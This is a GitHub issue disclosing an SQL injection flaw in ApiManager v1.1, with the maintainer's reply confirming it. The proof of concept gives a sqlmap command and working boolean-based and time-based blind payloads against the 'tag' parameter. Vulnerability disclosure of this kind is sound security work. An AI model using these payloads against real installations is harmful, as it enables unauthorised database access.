Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ApiManager v1.1 sql injection #26

Open
mukeers opened this issue Nov 10, 2021 · 1 comment
Open

ApiManager v1.1 sql injection #26

mukeers opened this issue Nov 10, 2021 · 1 comment

Comments

@mukeers
Copy link

mukeers commented Nov 10, 2021

poc :
python3 sqlmap.py - u "http://localhost/index.php?act=api&tag=8"

sqlmap identified the following injection point(s) with a total of HTTP(s) requests:

Parameter: tag (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=api&tag=8' AND 5773=5773 AND 'aeqS'='aeqS

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: act=api&tag=8' AND (SELECT 2616 FROM (SELECT(SLEEP(5)))Uikd) AND 'WWaT'='WWaT

@gongwalker
Copy link
Owner

Thank you for your feedback.
SQL injection exists in the apimanger for version. Please use the golang version.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants